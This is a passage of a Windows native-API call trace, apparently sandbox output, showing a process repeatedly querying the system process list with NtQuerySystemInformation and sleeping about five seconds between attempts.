NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.501] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.506] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.507] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.509] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.517] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.526] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.527] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.536] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.545] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.555] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.564] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.571] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.572] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.573] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.578] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.584] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.586] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.591] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.593] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.593] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.597] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.597] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.603] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.691] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.693] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.696] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.702] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.711] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.719] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.723] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.728] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.729] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.735] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.742] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.745] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.749] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, 